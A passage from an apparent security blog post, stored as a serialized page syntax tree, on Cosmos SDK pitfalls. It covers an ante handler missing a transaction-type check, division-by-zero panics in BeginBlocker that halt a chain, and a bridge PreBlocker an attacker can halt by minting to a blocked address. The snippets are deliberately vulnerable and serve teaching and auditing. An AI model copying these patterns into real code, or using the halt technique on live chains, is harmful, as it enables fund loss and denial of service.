dren":84571},{"style":8205},[84572],{"type":31,"value":84573},"                        \"rejecting tx with unsupported extension option\"",{"type":25,"tag":216,"props":84575,"children":84576},{"style":6964},[84577],{"type":31,"value":7465},{"type":25,"tag":216,"props":84579,"children":84580},{"class":6922,"line":27506},[84581],{"type":25,"tag":216,"props":84582,"children":84583},{"style":6964},[84584],{"type":31,"value":84466},{"type":25,"tag":216,"props":84586,"children":84587},{"class":6922,"line":27515},[84588],{"type":25,"tag":216,"props":84589,"children":84590},{"style":6964},[84591],{"type":31,"value":75041},{"type":25,"tag":216,"props":84593,"children":84594},{"class":6922,"line":27557},[84595],{"type":25,"tag":216,"props":84596,"children":84597},{"emptyLinePlaceholder":16},[84598],{"type":31,"value":7642},{"type":25,"tag":216,"props":84600,"children":84601},{"class":6922,"line":27590},[84602,84606,84610,84614,84618,84622,84626,84630,84634],{"type":25,"tag":216,"props":84603,"children":84604},{"style":6973},[84605],{"type":31,"value":64696},{"type":25,"tag":216,"props":84607,"children":84608},{"style":7047},[84609],{"type":31,"value":84095},{"type":25,"tag":216,"props":84611,"children":84612},{"style":6964},[84613],{"type":31,"value":1850},{"type":25,"tag":216,"props":84615,"children":84616},{"style":6947},[84617],{"type":31,"value":24240},{"type":25,"tag":216,"props":84619,"children":84620},{"style":6964},[84621],{"type":31,"value":7026},{"type":25,"tag":216,"props":84623,"children":84624},{"style":6947},[84625],{"type":31,"value":83153},{"type":25,"tag":216,"props":84627,"children":84628},{"style":6964},[84629],{"type":31,"value":7026},{"type":25,"tag":216,"props":84631,"children":84632},{"style":6947},[84633],{"type":31,"value":84033},{"type":25,"tag":216,"props":84635,"children":84636},{"style":6964},[84637],{"type":31,"value":7107},{"type":25,"tag":216,"props":84639,"children":84640},{"class":6922,"line":27598},[84641],{"type":25,"tag":216,"props":84642,"children":84643},{"style":6964},[84644],{"type":31,"value":62852},{"type":25,"tag":216,"props":84646,"children":84647},{"class":6922,"line":27606},[84648],{"type":25,"tag":216,"props":84649,"children":84650},{"style":6964},[84651],{"type":31,"value":7302},{"type":25,"tag":216,"props":84653,"children":84654},{"class":6922,"line":27615},[84655],{"type":25,"tag":216,"props":84656,"children":84657},{"emptyLinePlaceholder":16},[84658],{"type":31,"value":7642},{"type":25,"tag":216,"props":84660,"children":84661},{"class":6922,"line":27691},[84662],{"type":25,"tag":216,"props":84663,"children":84664},{"style":6927},[84665],{"type":31,"value":84666},"        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n",{"type":25,"tag":216,"props":84668,"children":84669},{"class":6922,"line":27724},[84670],{"type":25,"tag":216,"props":84671,"children":84672},{"emptyLinePlaceholder":16},[84673],{"type":31,"value":7642},{"type":25,"tag":216,"props":84675,"children":84676},{"class":6922,"line":27732},[84677,84682,84686,84690,84694],{"type":25,"tag":216,"props":84678,"children":84679},{"style":6973},[84680],{"type":31,"value":84681},"        switch",{"type":25,"tag":216,"props":84683,"children":84684},{"style":6947},[84685],{"type":31,"value":71997},{"type":25,"tag":216,"props":84687,"children":84688},{"style":6964},[84689],{"type":31,"value":82752},{"type":25,"tag":216,"props":84691,"children":84692},{"style":6936},[84693],{"type":31,"value":36719},{"type":25,"tag":216,"props":84695,"children":84696},{"style":6964},[84697],{"type":31,"value":18761},{"type":25,"tag":216,"props":84699,"children":84700},{"class":6922,"line":27740},[84701,84706,84710,84714,84718],{"type":25,"tag":216,"props":84702,"children":84703},{"style":6973},[84704],{"type":31,"value":84705},"        case",{"type":25,"tag":216,"props":84707,"children":84708},{"style":7375},[84709],{"type":31,"value":82613},{"type":25,"tag":216,"props":84711,"children":84712},{"style":6964},[84713],{"type":31,"value":179},{"type":25,"tag":216,"props":84715,"children":84716},{"style":7375},[84717],{"type":31,"value":82646},{"type":25,"tag":216,"props":84719,"children":84720},{"style":6964},[84721],{"type":31,"value":9518},{"type":25,"tag":216,"props":84723,"children":84724},{"class":6922,"line":27777},[84725,84730,84734,84738,84742,84746],{"type":25,"tag":216,"props":84726,"children":84727},{"style":6947},[84728],{"type":31,"value":84729},"            anteHandler",{"type":25,"tag":216,"props":84731,"children":84732},{"style":6953},[84733],{"type":31,"value":6956},{"type":25,"tag":216,"props":84735,"children":84736},{"style":6947},[84737],{"type":31,"value":82613},{"type":25,"tag":216,"props":84739,"children":84740},{"style":6964},[84741],{"type":31,"value":179},{"type":25,"tag":216,"props":84743,"children":84744},{"style":7047},[84745],{"type":31,"value":84404},{"type":25,"tag":216,"props":84747,"children":84748},{"style":6964},[84749],{"type":31,"value":7420},{"type":25,"tag":216,"props":84751,"children":84752},{"class":6922,"line":27790},[84753,84758,84762,84767,84771],{"type":25,"tag":216,"props":84754,"children":84755},{"style":6947},[84756],{"type":31,"value":84757},"                authante",{"type":25,"tag":216,"props":84759,"children":84760},{"style":6964},[84761],{"type":31,"value":179},{"type":25,"tag":216,"props":84763,"children":84764},{"style":7047},[84765],{"type":31,"value":84766},"NewSetUpContextDecorator",{"type":25,"tag":216,"props":84768,"children":84769},{"style":6964},[84770],{"type":31,"value":22334},{"type":25,"tag":216,"props":84772,"children":84773},{"style":6927},[84774],{"type":31,"value":83267},{"type":25,"tag":216,"props":84776,"children":84777},{"class":6922,"line":27803},[84778],{"type":25,"tag":216,"props":84779,"children":84780},{"style":6953},[84781],{"type":31,"value":84782},"                 ...\n",{"type":25,"tag":216,"props":84784,"children":84785},{"class":6922,"line":27816},[84786,84790,84794,84799,84803,84807,84811],{"type":25,"tag":216,"props":84787,"children":84788},{"style":6947},[84789],{"type":31,"value":84757},{"type":25,"tag":216,"props":84791,"children":84792},{"style":6964},[84793],{"type":31,"value":179},{"type":25,"tag":216,"props":84795,"children":84796},{"style":7047},[84797],{"type":31,"value":84798},"NewIncrementSequenceDecorator",{"type":25,"tag":216,"props":84800,"children":84801},{"style":6964},[84802],{"type":31,"value":1850},{"type":25,"tag":216,"props":84804,"children":84805},{"style":6947},[84806],{"type":31,"value":84449},{"type":25,"tag":216,"props":84808,"children":84809},{"style":6964},[84810],{"type":31,"value":5406},{"type":25,"tag":216,"props":84812,"children":84813},{"style":6927},[84814],{"type":31,"value":84815},"// innermost AnteDecorator\n",{"type":25,"tag":216,"props":84817,"children":84818},{"class":6922,"line":27870},[84819],{"type":25,"tag":216,"props":84820,"children":84821},{"style":6964},[84822],{"type":31,"value":81487},{"type":25,"tag":216,"props":84824,"children":84825},{"class":6922,"line":27879},[84826,84831],{"type":25,"tag":216,"props":84827,"children":84828},{"style":6973},[84829],{"type":31,"value":84830},"        default",{"type":25,"tag":216,"props":84832,"children":84833},{"style":6964},[84834],{"type":31,"value":9518},{"type":25,"tag":216,"props":84836,"children":84837},{"class":6922,"line":36243},[84838,84842,84846,84850,84854,84858,84862],{"type":25,"tag":216,"props":84839,"children":84840},{"style":6973},[84841],{"type":31,"value":83048},{"type":25,"tag":216,"props":84843,"children":84844},{"style":6947},[84845],{"type":31,"value":29801},{"type":25,"tag":216,"props":84847,"children":84848},{"style":6964},[84849],{"type":31,"value":7026},{"type":25,"tag":216,"props":84851,"children":84852},{"style":6947},[84853],{"type":31,"value":84506},{"type":25,"tag":216,"props":84855,"children":84856},{"style":6964},[84857],{"type":31,"value":179},{"type":25,"tag":216,"props":84859,"children":84860},{"style":7047},[84861],{"type":31,"value":84515},{"type":25,"tag":216,"props":84863,"children":84864},{"style":6964},[84865],{"type":31,"value":7420},{"type":25,"tag":216,"props":84867,"children":84868},{"class":6922,"line":36264},[84869,84874,84878,84883,84887,84891,84895,84900,84904,84909,84913,84917],{"type":25,"tag":216,"props":84870,"children":84871},{"style":6947},[84872],{"type":31,"value":84873},"                sdkerrors",{"type":25,"tag":216,"props":84875,"children":84876},{"style":6964},[84877],{"type":31,"value":179},{"type":25,"tag":216,"props":84879,"children":84880},{"style":7047},[84881],{"type":31,"value":84882},"Wrapf",{"type":25,"tag":216,"props":84884,"children":84885},{"style":6964},[84886],{"type":31,"value":1850},{"type":25,"tag":216,"props":84888,"children":84889},{"style":6947},[84890],{"type":31,"value":84544},{"type":25,"tag":216,"props":84892,"children":84893},{"style":6964},[84894],{"type":31,"value":179},{"type":25,"tag":216,"props":84896,"children":84897},{"style":6947},[84898],{"type":31,"value":84899},"ErrUnknownRequest",{"type":25,"tag":216,"props":84901,"children":84902},{"style":6964},[84903],{"type":31,"value":7026},{"type":25,"tag":216,"props":84905,"children":84906},{"style":8205},[84907],{"type":31,"value":84908},"\"invalid transaction type: %T\"",{"type":25,"tag":216,"props":84910,"children":84911},{"style":6964},[84912],{"type":31,"value":7026},{"type":25,"tag":216,"props":84914,"children":84915},{"style":6947},[84916],{"type":31,"value":83153},{"type":25,"tag":216,"props":84918,"children":84919},{"style":6964},[84920],{"type":31,"value":10688},{"type":25,"tag":216,"props":84922,"children":84924},{"class":6922,"line":84923},53,[84925,84930],{"type":25,"tag":216,"props":84926,"children":84927},{"style":8205},[84928],{"type":31,"value":84929},"                \"transaction is not an SDK tx\"",{"type":25,"tag":216,"props":84931,"children":84932},{"style":6964},[84933],{"type":31,"value":7465},{"type":25,"tag":216,"props":84935,"children":84937},{"class":6922,"line":84936},54,[84938],{"type":25,"tag":216,"props":84939,"children":84940},{"style":6964},[84941],{"type":31,"value":81487},{"type":25,"tag":216,"props":84943,"children":84945},{"class":6922,"line":84944},55,[84946],{"type":25,"tag":216,"props":84947,"children":84948},{"style":6964},[84949],{"type":31,"value":7302},{"type":25,"tag":216,"props":84951,"children":84953},{"class":6922,"line":84952},56,[84954],{"type":25,"tag":216,"props":84955,"children":84956},{"emptyLinePlaceholder":16},[84957],{"type":31,"value":7642},{"type":25,"tag":216,"props":84959,"children":84961},{"class":6922,"line":84960},57,[84962,84966,84970,84974,84978,84982,84986,84990,84994],{"type":25,"tag":216,"props":84963,"children":84964},{"style":6973},[84965],{"type":31,"value":19702},{"type":25,"tag":216,"props":84967,"children":84968},{"style":7047},[84969],{"type":31,"value":84095},{"type":25,"tag":216,"props":84971,"children":84972},{"style":6964},[84973],{"type":31,"value":1850},{"type":25,"tag":216,"props":84975,"children":84976},{"style":6947},[84977],{"type":31,"value":24240},{"type":25,"tag":216,"props":84979,"children":84980},{"style":6964},[84981],{"type":31,"value":7026},{"type":25,"tag":216,"props":84983,"children":84984},{"style":6947},[84985],{"type":31,"value":83153},{"type":25,"tag":216,"props":84987,"children":84988},{"style":6964},[84989],{"type":31,"value":7026},{"type":25,"tag":216,"props":84991,"children":84992},{"style":6947},[84993],{"type":31,"value":84033},{"type":25,"tag":216,"props":84995,"children":84996},{"style":6964},[84997],{"type":31,"value":7107},{"type":25,"tag":216,"props":84999,"children":85001},{"class":6922,"line":85000},58,[85002],{"type":25,"tag":216,"props":85003,"children":85004},{"style":6964},[85005],{"type":31,"value":7311},{"type":25,"tag":216,"props":85007,"children":85009},{"class":6922,"line":85008},59,[85010],{"type":25,"tag":216,"props":85011,"children":85012},{"style":6964},[85013],{"type":31,"value":7874},{"type":25,"tag":38,"props":85015,"children":85016},{},[85017,85019,85024,85026,85033,85034,85041],{"type":31,"value":85018},"Additional examples of incorrect ",{"type":25,"tag":82,"props":85020,"children":85022},{"className":85021},[],[85023],{"type":31,"value":82442},{"type":31,"value":85025}," usage include ",{"type":25,"tag":162,"props":85027,"children":85030},{"href":85028,"rel":85029},"https://jumpcrypto.com/writing/bypassing-ethermint-ante-handlers",[166],[85031],{"type":31,"value":85032},"yet more bypassable checks and loss of funds",{"type":31,"value":1307},{"type":25,"tag":162,"props":85035,"children":85038},{"href":85036,"rel":85037},"https://github.com/cosmos/ibc-go/issues/853",[166],[85039],{"type":31,"value":85040},"incorrect data passing between blockchains",{"type":31,"value":179},{"type":25,"tag":26,"props":85043,"children":85045},{"id":85044},"errors-panics-i-can-handle-it",[85046],{"type":31,"value":85047},"Errors? Panics? I can handle it",{"type":25,"tag":38,"props":85049,"children":85050},{},[85051],{"type":31,"value":85052},"Smart contract developers are used to not properly handling errors. This is acceptable since most underlying blockchains revert all state changes when execution fails.",{"type":25,"tag":38,"props":85054,"children":85055},{},[85056],{"type":31,"value":85057},"Cosmos is designed to provide a similar experience. Whenever some message handler returns an error, changes to the persistent state are dropped. Panics are handled similarly, where a recovery handler is wrapped around the message execution to convert panics into errors for a downstream process.",{"type":25,"tag":38,"props":85059,"children":85060},{},[85061,85063,85069,85071,85076],{"type":31,"value":85062},"This design is pretty neat and allows developers to write code in a rather lazy way. For instance, the following code works perfectly fine. If ",{"type":25,"tag":82,"props":85064,"children":85066},{"className":85065},[],[85067],{"type":31,"value":85068},"k.keeper.TotalReward()",{"type":31,"value":85070}," returns zero, the ",{"type":25,"tag":82,"props":85072,"children":85074},{"className":85073},[],[85075],{"type":31,"value":61914},{"type":31,"value":85077}," execution will simply rollback as if nothing has happened.",{"type":25,"tag":206,"props":85079,"children":85081},{"code":85080,"language":80136,"meta":7,"className":80137,"style":7},"func (k msgServer) AllocateReward(\n    goCtx context.Context,\n    msg *types.MsgAllocateReward)\n(*types.MsgAllocatRewardResponse, error) {\n\n    RewardPerShare := k.keeper.Shares() /  k.keeper.TotalReward()\n    k.keeper.DistributeReward(RewardPerShare)\n\n    return &types.MsgAllocateRewardResponse, nil\n}\n",[85082],{"type":25,"tag":82,"props":85083,"children":85084},{"__ignoreMap":7},[85085,85118,85141,85169,85205,85212,85281,85319,85326,85358],{"type":25,"tag":216,"props":85086,"children":85087},{"class":6922,"line":6923},[85088,85092,85096,85101,85105,85109,85114],{"type":25,"tag":216,"props":85089,"children":85090},{"style":6936},[85091],{"type":31,"value":80272},{"type":25,"tag":216,"props":85093,"children":85094},{"style":6964},[85095],{"type":31,"value":7016},{"type":25,"tag":216,"props":85097,"children":85098},{"style":6947},[85099],{"type":31,"value":85100},"k ",{"type":25,"tag":216,"props":85102,"children":85103},{"style":7375},[85104],{"type":31,"value":80286},{"type":25,"tag":216,"props":85106,"children":85107},{"style":6964},[85108],{"type":31,"value":7036},{"type":25,"tag":216,"props":85110,"children":85111},{"style":7047},[85112],{"type":31,"value":85113},"AllocateReward",{"type":25,"tag":216,"props":85115,"children":85116},{"style":6964},[85117],{"type":31,"value":7420},{"type":25,"tag":216,"props":85119,"children":85120},{"class":6922,"line":6769},[85121,85125,85129,85133,85137],{"type":25,"tag":216,"props":85122,"children":85123},{"style":6947},[85124],{"type":31,"value":80307},{"type":25,"tag":216,"props":85126,"children":85127},{"style":7375},[85128],{"type":31,"value":80312},{"type":25,"tag":216,"props":85130,"children":85131},{"style":6964},[85132],{"type":31,"value":179},{"type":25,"tag":216,"props":85134,"children":85135},{"style":7375},[85136],{"type":31,"value":80321},{"type":25,"tag":216,"props":85138,"children":85139},{"style":6964},[85140],{"type":31,"value":7465},{"type":25,"tag":216,"props":85142,"children":85143},{"class":6922,"line":6778},[85144,85148,85152,85156,85160,85165],{"type":25,"tag":216,"props":85145,"children":85146},{"style":6947},[85147],{"type":31,"value":80333},{"type":25,"tag":216,"props":85149,"children":85150},{"style":6953},[85151],{"type":31,"value":13773},{"type":25,"tag":216,"props":85153,"children":85154},{"style":7375},[85155],{"type":31,"value":9709},{"type":25,"tag":216,"props":85157,"children":85158},{"style":6964},[85159],{"type":31,"value":179},{"type":25,"tag":216,"props":85161,"children":85162},{"style":7375},[85163],{"type":31,"value":85164},"MsgAllocateReward",{"type":25,"tag":216,"props":85166,"children":85167},{"style":6964},[85168],{"type":31,"value":7107},{"type":25,"tag":216,"props":85170,"children":85171},{"class":6922,"line":7005},[85172,85176,85180,85184,85188,85193,85197,85201],{"type":25,"tag":216,"props":85173,"children":85174},{"style":6964},[85175],{"type":31,"value":1850},{"type":25,"tag":216,"props":85177,"children":85178},{"style":6953},[85179],{"type":31,"value":8519},{"type":25,"tag":216,"props":85181,"children":85182},{"style":7375},[85183],{"type":31,"value":9709},{"type":25,"tag":216,"props":85185,"children":85186},{"style":6964},[85187],{"type":31,"value":179},{"type":25,"tag":216,"props":85189,"children":85190},{"style":7375},[85191],{"type":31,"value":85192},"MsgAllocatRewardResponse",{"type":25,"tag":216,"props":85194,"children":85195},{"style":6964},[85196],{"type":31,"value":7026},{"type":25,"tag":216,"props":85198,"children":85199},{"style":7375},[85200],{"type":31,"value":18821},{"type":25,"tag":216,"props":85202,"children":85203},{"style":6964},[85204],{"type":31,"value":18761},{"type":25,"tag":216,"props":85206,"children":85207},{"class":6922,"line":7110},[85208],{"type":25,"tag":216,"props":85209,"children":85210},{"emptyLinePlaceholder":16},[85211],{"type":31,"value":7642},{"type":25,"tag":216,"props":85213,"children":85214},{"class":6922,"line":7216},[85215,85220,85224,85229,85233,85238,85242,85247,85251,85255,85260,85264,85268,85272,85277],{"type":25,"tag":216,"props":85216,"children":85217},{"style":6947},[85218],{"type":31,"value":85219},"    RewardPerShare",{"type":25,"tag":216,"props":85221,"children":85222},{"style":6953},[85223],{"type":31,"value":80388},{"type":25,"tag":216,"props":85225,"children":85226},{"style":6947},[85227],{"type":31,"value":85228}," k",{"type":25,"tag":216,"props":85230,"children":85231},{"style":6964},[85232],{"type":31,"value":179},{"type":25,"tag":216,"props":85234,"children":85235},{"style":6947},[85236],{"type":31,"value":85237},"keeper",{"type":25,"tag":216,"props":85239,"children":85240},{"style":6964},[85241],{"type":31,"value":179},{"type":25,"tag":216,"props":85243,"children":85244},{"style":7047},[85245],{"type":31,"value":85246},"Shares",{"type":25,"tag":216,"props":85248,"children":85249},{"style":6964},[85250],{"type":31,"value":18000},{"type":25,"tag":216,"props":85252,"children":85253},{"style":6953},[85254],{"type":31,"value":5755},{"type":25,"tag":216,"props":85256,"children":85257},{"style":6947},[85258],{"type":31,"value":85259},"  k",{"type":25,"tag":216,"props":85261,"children":85262},{"style":6964},[85263],{"type":31,"value":179},{"type":25,"tag":216,"props":85265,"children":85266},{"style":6947},[85267],{"type":31,"value":85237},{"type":25,"tag":216,"props":85269,"children":85270},{"style":6964},[85271],{"type":31,"value":179},{"type":25,"tag":216,"props":85273,"children":85274},{"style":7047},[85275],{"type":31,"value":85276},"TotalReward",{"type":25,"tag":216,"props":85278,"children":85279},{"style":6964},[85280],{"type":31,"value":11687},{"type":25,"tag":216,"props":85282,"children":85283},{"class":6922,"line":7244},[85284,85289,85293,85297,85301,85306,85310,85315],{"type":25,"tag":216,"props":85285,"children":85286},{"style":6947},[85287],{"type":31,"value":85288},"    k",{"type":25,"tag":216,"props":85290,"children":85291},{"style":6964},[85292],{"type":31,"value":179},{"type":25,"tag":216,"props":85294,"children":85295},{"style":6947},[85296],{"type":31,"value":85237},{"type":25,"tag":216,"props":85298,"children":85299},{"style":6964},[85300],{"type":31,"value":179},{"type":25,"tag":216,"props":85302,"children":85303},{"style":7047},[85304],{"type":31,"value":85305},"DistributeReward",{"type":25,"tag":216,"props":85307,"children":85308},{"style":6964},[85309],{"type":31,"value":1850},{"type":25,"tag":216,"props":85311,"children":85312},{"style":6947},[85313],{"type":31,"value":85314},"RewardPerShare",{"type":25,"tag":216,"props":85316,"children":85317},{"style":6964},[85318],{"type":31,"value":7107},{"type":25,"tag":216,"props":85320,"children":85321},{"class":6922,"line":7257},[85322],{"type":25,"tag":216,"props":85323,"children":85324},{"emptyLinePlaceholder":16},[85325],{"type":31,"value":7642},{"type":25,"tag":216,"props":85327,"children":85328},{"class":6922,"line":7275},[85329,85333,85337,85341,85345,85350,85354],{"type":25,"tag":216,"props":85330,"children":85331},{"style":6973},[85332],{"type":31,"value":20947},{"type":25,"tag":216,"props":85334,"children":85335},{"style":6953},[85336],{"type":31,"value":11093},{"type":25,"tag":216,"props":85338,"children":85339},{"style":6947},[85340],{"type":31,"value":9709},{"type":25,"tag":216,"props":85342,"children":85343},{"style":6964},[85344],{"type":31,"value":179},{"type":25,"tag":216,"props":85346,"children":85347},{"style":6947},[85348],{"type":31,"value":85349},"MsgAllocateRewardResponse",{"type":25,"tag":216,"props":85351,"children":85352},{"style":6964},[85353],{"type":31,"value":7026},{"type":25,"tag":216,"props":85355,"children":85356},{"style":6936},[85357],{"type":31,"value":80614},{"type":25,"tag":216,"props":85359,"children":85360},{"class":6922,"line":7296},[85361],{"type":25,"tag":216,"props":85362,"children":85363},{"style":6964},[85364],{"type":31,"value":7874},{"type":25,"tag":38,"props":85366,"children":85367},{},[85368,85370,85376,85377,85383,85384,85390,85392,85397],{"type":31,"value":85369},"However, the same assumption does not always hold. Certain parts of Cosmos, such as ",{"type":25,"tag":82,"props":85371,"children":85373},{"className":85372},[],[85374],{"type":31,"value":85375},"PreBlocker",{"type":31,"value":7026},{"type":25,"tag":82,"props":85378,"children":85380},{"className":85379},[],[85381],{"type":31,"value":85382},"BeginBlocker",{"type":31,"value":10439},{"type":25,"tag":82,"props":85385,"children":85387},{"className":85386},[],[85388],{"type":31,"value":85389},"EndBlocker",{"type":31,"value":85391},", are not protected by the error handling mechanism. So, if we move the reward distribution logic into ",{"type":25,"tag":82,"props":85393,"children":85395},{"className":85394},[],[85396],{"type":31,"value":85382},{"type":31,"value":85398}," to automatically distribute rewards at the start of each block, panics raised by division by 0 will halt the chain.",{"type":25,"tag":206,"props":85400,"children":85402},{"code":85401,"language":80136,"meta":7,"className":80137,"style":7},"func BeginBlocker(ctx context.Context, keeper keeper.Keeper) error {\n\n    RewardPerShare := keeper.Shares() /  keeper.TotalReward()\n    keeper.DistributeReward(RewardPerShare)\n\n return nil\n}\n",[85403],{"type":25,"tag":82,"props":85404,"children":85405},{"__ignoreMap":7},[85406,85471,85478,85526,85554,85561,85573],{"type":25,"tag":216,"props":85407,"children":85408},{"class":6922,"line":6923},[85409,85413,85418,85422,85426,85430,85434,85438,85442,85446,85451,85455,85459,85463,85467],{"type":25,"tag":216,"props":85410,"children":85411},{"style":6936},[85412],{"type":31,"value":80272},{"type":25,"tag":216,"props":85414,"children":85415},{"style":7047},[85416],{"type":31,"value":85417}," BeginBlocker",{"type":25,"tag":216,"props":85419,"children":85420},{"style":6964},[85421],{"type":31,"value":1850},{"type":25,"tag":216,"props":85423,"children":85424},{"style":6947},[85425],{"type":31,"value":24240},{"type":25,"tag":216,"props":85427,"children":85428},{"style":7375},[85429],{"type":31,"value":80312},{"type":25,"tag":216,"props":85431,"children":85432},{"style":6964},[85433],{"type":31,"value":179},{"type":25,"tag":216,"props":85435,"children":85436},{"style":7375},[85437],{"type":31,"value":80321},{"type":25,"tag":216,"props":85439,"children":85440},{"style":6964},[85441],{"type":31,"value":7026},{"type":25,"tag":216,"props":85443,"children":85444},{"style":6947},[85445],{"type":31,"value":85237},{"type":25,"tag":216,"props":85447,"children":85448},{"style":7375},[85449],{"type":31,"value":85450}," keeper",{"type":25,"tag":216,"props":85452,"children":85453},{"style":6964},[85454],{"type":31,"value":179},{"type":25,"tag":216,"props":85456,"children":85457},{"style":7375},[85458],{"type":31,"value":83917},{"type":25,"tag":216,"props":85460,"children":85461},{"style":6964},[85462],{"type":31,"value":7036},{"type":25,"tag":216,"props":85464,"children":85465},{"style":7375},[85466],{"type":31,"value":18821},{"type":25,"tag":216,"props":85468,"children":85469},{"style":6964},[85470],{"type":31,"value":7241},{"type":25,"tag":216,"props":85472,"children":85473},{"class":6922,"line":6769},[85474],{"type":25,"tag":216,"props":85475,"children":85476},{"emptyLinePlaceholder":16},[85477],{"type":31,"value":7642},{"type":25,"tag":216,"props":85479,"children":85480},{"class":6922,"line":6778},[85481,85485,85489,85493,85497,85501,85505,85509,85514,85518,85522],{"type":25,"tag":216,"props":85482,"children":85483},{"style":6947},[85484],{"type":31,"value":85219},{"type":25,"tag":216,"props":85486,"children":85487},{"style":6953},[85488],{"type":31,"value":80388},{"type":25,"tag":216,"props":85490,"children":85491},{"style":6947},[85492],{"type":31,"value":85450},{"type":25,"tag":216,"props":85494,"children":85495},{"style":6964},[85496],{"type":31,"value":179},{"type":25,"tag":216,"props":85498,"children":85499},{"style":7047},[85500],{"type":31,"value":85246},{"type":25,"tag":216,"props":85502,"children":85503},{"style":6964},[85504],{"type":31,"value":18000},{"type":25,"tag":216,"props":85506,"children":85507},{"style":6953},[85508],{"type":31,"value":5755},{"type":25,"tag":216,"props":85510,"children":85511},{"style":6947},[85512],{"type":31,"value":85513},"  keeper",{"type":25,"tag":216,"props":85515,"children":85516},{"style":6964},[85517],{"type":31,"value":179},{"type":25,"tag":216,"props":85519,"children":85520},{"style":7047},[85521],{"type":31,"value":85276},{"type":25,"tag":216,"props":85523,"children":85524},{"style":6964},[85525],{"type":31,"value":11687},{"type":25,"tag":216,"props":85527,"children":85528},{"class":6922,"line":7005},[85529,85534,85538,85542,85546,85550],{"type":25,"tag":216,"props":85530,"children":85531},{"style":6947},[85532],{"type":31,"value":85533},"    keeper",{"type":25,"tag":216,"props":85535,"children":85536},{"style":6964},[85537],{"type":31,"value":179},{"type":25,"tag":216,"props":85539,"children":85540},{"style":7047},[85541],{"type":31,"value":85305},{"type":25,"tag":216,"props":85543,"children":85544},{"style":6964},[85545],{"type":31,"value":1850},{"type":25,"tag":216,"props":85547,"children":85548},{"style":6947},[85549],{"type":31,"value":85314},{"type":25,"tag":216,"props":85551,"children":85552},{"style":6964},[85553],{"type":31,"value":7107},{"type":25,"tag":216,"props":85555,"children":85556},{"class":6922,"line":7110},[85557],{"type":25,"tag":216,"props":85558,"children":85559},{"emptyLinePlaceholder":16},[85560],{"type":31,"value":7642},{"type":25,"tag":216,"props":85562,"children":85563},{"class":6922,"line":7216},[85564,85568],{"type":25,"tag":216,"props":85565,"children":85566},{"style":6973},[85567],{"type":31,"value":56834},{"type":25,"tag":216,"props":85569,"children":85570},{"style":6936},[85571],{"type":31,"value":85572}," nil\n",{"type":25,"tag":216,"props":85574,"children":85575},{"class":6922,"line":7244},[85576],{"type":25,"tag":216,"props":85577,"children":85578},{"style":6964},[85579],{"type":31,"value":7874},{"type":25,"tag":606,"props":85581,"children":85583},{"id":85582},"real-world-examples-3",[85584],{"type":31,"value":80661},{"type":25,"tag":38,"props":85586,"children":85587},{},[85588],{"type":31,"value":85589},"Recently, developers have become increasingly aware of unprotected ABCI functions, but this doesn't stop DoS bugs from manifesting. So what is the catch?",{"type":25,"tag":38,"props":85591,"children":85592},{},[85593,85595,85601,85603,85608,85610,85616,85618,85624,85626,85632],{"type":31,"value":85594},"The problem lies in the lack of proper understanding of utility functions. The example here implements a bridge that mints wrapped BTC tokens in the PreBlocker when bridging events are observed. Notably, errors returned by ",{"type":25,"tag":82,"props":85596,"children":85598},{"className":85597},[],[85599],{"type":31,"value":85600},"bankKeeper.SendCoinsFromModuleToAccount",{"type":31,"value":85602}," will be bubbled up through ",{"type":25,"tag":82,"props":85604,"children":85606},{"className":85605},[],[85607],{"type":31,"value":85375},{"type":31,"value":85609}," and halt the chain. It turns out an attacker can force ",{"type":25,"tag":82,"props":85611,"children":85613},{"className":85612},[],[85614],{"type":31,"value":85615},"SendCoinsFromModuleToAccount",{"type":31,"value":85617}," to return an error by setting ",{"type":25,"tag":82,"props":85619,"children":85621},{"className":85620},[],[85622],{"type":31,"value":85623},"recipient",{"type":31,"value":85625}," to some ",{"type":25,"tag":82,"props":85627,"children":85629},{"className":85628},[],[85630],{"type":31,"value":85631},"BlockedAddr",{"type":31,"value":85633},",rendering the code susceptible to DoS attacks.",{"type":25,"tag":38,"props":85635,"children":85636},{},[85637],{"type":25,"tag":162,"props":85638,"children":85641},{"href":85639,"rel":85640},"https://github.com/mezo-org/mezod/blob/d3b1a049a9acce977fdadd245cb381252f101922/x/bridge/keeper/assets_locked.go#L170",[166],[85642],{"type":31,"value":80711},{"type":25,"tag":206,"props":85644,"children":85646},{"code":85645,"language":80136,"meta":7,"className":80137,"style":7},"func (pbh *PreBlockHandler) PreBlocker() sdk.PreBlocker {\n    return func(\n        ctx sdk.Context,\n        req *cmtabci.RequestFinalizeBlock,\n    ) (*sdk.ResponsePreBlock, error) {\n        ...\n        err := pbh.bridgeKeeper.AcceptAssetsLocked(ctx, events)\n        if err != nil {\n            return nil, fmt.Errorf(\"cannot accept AssetsLocked events: %w\", err)\n        }\n        ...\n    }\n}\n\nfunc (k Keeper) AcceptAssetsLocked(\n    ctx sdk.Context,\n    events types.AssetsLockedEvents,\n) error {\n    ...\n    for _, event := range events {\n        recipient, err := sdk.AccAddressFromBech32(event.Recipient)\n        if err != nil {\n            return fmt.Errorf(\"failed to parse recipient address: %w\", err)\n        }\n\n        if bytes.Equal(event.TokenBytes(), sourceBTCToken) {\n            err = k.mintBTC(ctx, recipient, event.Amount)\n            if err != nil {\n                return fmt.Errorf(\n                    \"failed to mint BTC for event %v: %w\",\n                    event.Sequence,\n                    err,\n                )\n            }\n        } else {\n            ...\n        }\n    }\n    ...\n}\n\nfunc (k Keeper) mintBTC(\n    ctx sdk.Context,\n    recipient sdk.AccAddress,\n    amount math.Int,\n) error {\n    ...\n    err = k.bankKeeper.SendCoinsFromModuleToAccount(\n        ctx,\n        types.ModuleName,\n        recipient,\n        coins,\n    )\n    if err != nil {\n        return fmt.Errorf(\"failed to send coins: %w\", err)\n    }\n    